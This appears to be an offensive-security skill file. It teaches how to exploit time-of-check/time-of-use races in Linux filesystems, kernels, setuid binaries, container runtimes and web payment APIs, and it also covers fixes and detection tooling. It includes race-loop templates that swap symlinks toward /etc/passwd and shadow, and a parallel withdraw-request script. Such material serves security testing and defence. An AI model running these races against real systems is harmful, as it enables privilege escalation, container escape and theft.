| name | offensive-toctou |
| description | Time-of-Check / Time-of-Use (TOCTOU) race condition exploitation methodology across binary, kernel, filesystem, web, and container layers. Covers symbolic-link races (open/access/stat split), file-descriptor races, fopen/realpath traversal races, /proc and procfs races, FUSE-backed slow-fs races to widen the window, ptrace and signal races, kernel double-fetch / userspace pointer races, container/runc/symlink escape primitives, kubernetes admission/authz TOCTOU, web auth-vs-authz TOCTOU, JWT-claim TOCTOU at gateway vs service, payment/idempotency races, and modern race-amplification techniques (single-packet attack, slow loris, FUSE pause, cgroup freeze, scheduler shaping). Use when you've identified a 'check then act' pattern in code, when fuzzing for race conditions, or when exploiting concurrency bugs in privileged binaries / kernel / orchestrators. |
TOCTOU — Time-of-Check / Time-of-Use Exploitation
A TOCTOU bug exists wherever code checks a property (file owner, path target, token validity, balance) and then acts on it as if the property still holds. Between check and use is a window — your job is to widen it and swap the underlying object.
Quick Workflow
- Identify the check (syscall, function, validation step) and the use (the privileged action)
- Confirm the check and use don't operate on the same kernel object (FD, inode, atomic snapshot)
- Build a primitive that swaps the object between check and use (symlink, mount, mv, parallel request)
- Widen the window with FUSE, slow filesystems, scheduler tricks, or single-packet HTTP/2
- Run a tight loop and confirm the post-use state corresponds to the swapped target
The Core Pattern
if (access(path, W_OK) == 0) {
fd = open(path, O_WRONLY);
write(fd, attacker_data, n);
}
Between access and open, an attacker replaces path with a symlink to /etc/shadow. The check sees an attacker-owned file; the use opens shadow as root.
The fix is always: operate on the kernel object, not the path. Use O_NOFOLLOW, openat with AT_SYMLINK_NOFOLLOW, fstat on the FD, etc.
Filesystem TOCTOU
Symlink Swap (Classic)
victim --output /tmp/.attacker/output
while true; do
ln -sf /etc/passwd /tmp/.attacker/output 2>/dev/null
ln -sf /tmp/.attacker/legit /tmp/.attacker/output 2>/dev/null
done &
while true; do victim --output /tmp/.attacker/output; done
renameat2(RENAME_EXCHANGE) — Atomic Single-Frame Swap
syscall(SYS_renameat2, AT_FDCWD, "good", AT_FDCWD, "bad", RENAME_EXCHANGE);
RENAME_EXCHANGE swaps two paths atomically — combined with FUSE-paused dir lookups, this is a near-deterministic primitive on Linux ≥ 3.15.
Directory Swap (mv between two prepared trees)
When the victim resolves parent/file, swap parent itself:
mv good_dir parent && mv evil_dir parent_was_good_dir
Bind Mount / Mount-Namespace Swap (root-only or in user-ns)
unshare -mUr
mkdir /tmp/x /tmp/y
echo benign > /tmp/x/file
mount --bind /etc/shadow /tmp/y/file
In containerized contexts with CAP_SYS_ADMIN in a user namespace, this is the foundation of multiple runc/CVE escape chains.
Window-Widening Primitives
The race is always winnable in theory; in practice you need the window large enough for your swap.
FUSE-Backed Slow Filesystem
Mount a FUSE filesystem you control. When the victim does open or stat, your handler sleeps:
class SlowFS(Operations):
def getattr(self, path, fh=None):
if path == '/trigger':
time.sleep(5)
return os.lstat(self.root + path).__dict__
Now the check call inside the victim blocks for 5 seconds — plenty of time to swap the post-check filename.
Userfaultfd (kernel-level page faults)
ioctl(uffd, UFFDIO_REGISTER, ®);
userfaultfd can pause a kernel-side copy_from_user mid-read, enabling double-fetch wins. Linux ≥ 5.11 requires vm.unprivileged_userfaultfd=1 (off by default in many distros).
Cgroup Freeze
mkdir /sys/fs/cgroup/race
echo $victim_pid > /sys/fs/cgroup/race/cgroup.procs
echo 1 > /sys/fs/cgroup/race/cgroup.freeze
echo 0 > /sys/fs/cgroup/race/cgroup.freeze
Single-CPU Pinning + sched_yield
cpu_set_t set; CPU_ZERO(&set); CPU_SET(0, &set);
sched_setaffinity(victim_pid, sizeof(set), &set);
Kernel Double-Fetch
A kernel function reads the same userspace location twice; an attacker mutates it in between using userfaultfd or another thread.
copy_from_user(&size, &user_arg->size, 4);
if (size > MAX) return -EINVAL;
copy_from_user(buf, user_arg->data, size);
Tooling: KFENCE, Bochspwn-Reloaded, DECAF — fuzzers and analyzers that detect double-fetches.
/proc and procfs Races
/proc/pid/exe + ptrace
/proc/<pid>/exe is a magic symlink. If a privileged binary opens it after fork+exec, an attacker can race the exec to point exe at attacker-controlled binary on a slow filesystem. Foundation of CVE-2019-5736 (runc).
fd = open("/proc/self/exe", O_RDONLY);
/proc/pid/mem
open("/proc/pid/mem") followed by lseek+write historically bypassed write protections. Modern kernels enforce ptrace credentials at write time, but legacy or patched-out checks still exist in embedded kernels.
/proc/pid/cwd / fd / root
Symlinks resolve at deref time using the target task's namespace. Cross-namespace deref of /proc/pid/root/etc/shadow from a sibling container is a recurring vuln class.
Setuid Binary TOCTOU
if (!access(file, R_OK)) {
fd = open(file, O_RDONLY);
sendfile(stdout, fd, ...);
}
Symlink swap between access and open makes the binary read root-readable files for unprivileged users.
Rule of thumb when reviewing setuid/setgid binaries: every path appearing twice in a syscall trace is a candidate.
strace -f -e openat,access,stat,lstat,readlink ./suid_binary 2>&1 | grep "$user_input"
Container Escape via TOCTOU
CVE-2019-5736 (runc) — /proc/self/exe Overwrite
When a container runs docker exec, runc opens /proc/self/exe from the host. By replacing the in-container binary with a symlink to /proc/self/exe, the host runc rewrites itself.
CVE-2024-21626 (runc "Leaky Vessels") — Working-Directory FD Leak
A leaked file descriptor to the host filesystem could be inherited via WORKDIR /proc/self/fd/<n> — the container's first process held a host FD, races on namespace setup let it act on host paths.
Symlink-on-Mount Race
When the runtime resolves a bind-mount source/target path (e.g. for tmpfs setup), a fast attacker swaps a directory in the path with a symlink to /. Common in Kubernetes hostPath, Docker volumes, OpenShift SCC bypasses.
Web / API TOCTOU
Auth vs Authz Split at Gateway
Gateway: validates JWT (signature, exp) → forwards to service
Service: trusts gateway's "X-User-Id" header
If the JWT is revoked between gateway cache and gateway validation, or the gateway caches "valid" results too long, you get post-revocation access. Cache-key confusion (different gateway nodes) widens the window.
Permission Recheck Skipped on Long-Running Action
def long_export(user, resource_id):
check_access(user, resource_id)
data = stream_resource(resource_id)
return data
Test: revoke access while a download is mid-stream; if data continues, recheck is missing.
Idempotency-Key Reuse with Different Body
POST /api/withdraw Idempotency-Key: K1 { "amount": 1 }
POST /api/withdraw Idempotency-Key: K1 { "amount": 1000 } # Same key, different body
Many implementations key only on the key, not key+body-hash → second request returns the first's response while still processing the second's debit.
Single-Packet Multi-Request
HTTP/2: hold N requests' DATA frames, send all END_STREAM in one TCP segment.
Server schedules N handlers concurrently with sub-millisecond skew → reliable race wins.
Tool: Burp Repeater "Send group in parallel (single-packet)".
This is the standard primitive for web TOCTOU since 2023; old httpie ... & parallelism is obsolete.
Limit / Quota TOCTOU
if user.balance >= amount:
user.balance -= amount
pay(user, amount)
Send N parallel requests, each sees the same pre-decrement balance. Fix: atomic decrement with constraint (UPDATE ... WHERE balance >= amount).
Mobile / Binary Cookbook
Android: Intent Redirect TOCTOU
Activity checks calling package via getCallingPackage() then dispatches via Intent — between check and dispatch, attacker swaps the underlying ContentProvider URI authority resolution.
iOS: NSXPC Audit Token Confusion
audit_token_t should be captured at the start of each XPC message handling. If the service captures it once and reuses, an attacker can race PID reuse to impersonate.
Detection & Tooling
| Tool | Layer | Use |
|---|
strace -e trace=file -f | Linux syscall | Find duplicate path resolutions |
bpftrace / bcc | Kernel | Probe specific syscalls' args at scale |
| ThreadSanitizer (TSan) | Userspace C/C++ | Compile-time race detection |
| Helgrind / DRD | Userspace | Pthread race detection |
| Bochspwn-Reloaded | Kernel | Double-fetch detection |
syzkaller | Kernel | Coverage-guided race fuzzing |
| Burp Suite (Repeater single-packet) | Web/HTTP | Concurrent request races |
racepwn | Web | Multi-thread + timing harness |
Turbo Intruder | Web | Pipelined parallel requests |
strace -f -e trace=file ./target 2>&1 | \
awk -F'"' '/access|stat|lstat|open|readlink/ {print $2}' | \
sort | uniq -c | sort -rn | head
Race Loop Templates
Filesystem (C)
#include <sys/syscall.h>
#include <linux/fs.h>
int main() {
pid_t p = fork();
if (!p) { for(;;) syscall(SYS_renameat2, -100,"a",-100,"b",RENAME_EXCHANGE); }
for(;;) execve(victim, args, env);
}
Web (Python — single-packet HTTP/2)
import httpx, anyio
async def race():
async with httpx.AsyncClient(http2=True) as c:
async with anyio.create_task_group() as tg:
for _ in range(30):
tg.start_soon(c.post, "https://app/withdraw", json={"amount": 100})
anyio.run(race)
For real reliability on TLS, prefer Burp's single-packet feature — it crafts an HTTP/2 last-byte synchronization.
Reporting / Severity
A TOCTOU finding's severity rests on: window size (deterministic vs probabilistic), required adjacency (local user / container / authenticated remote), and the post-use primitive (file write, auth bypass, money). A "1-in-10000 race that gives root" is the same finding as a "deterministic race that gives root" once it's chained with a window-widening primitive. Always demonstrate:
- The minimum reproducer
- The window-widener used
- The success rate observed
- The post-exploit primitive achieved
Key References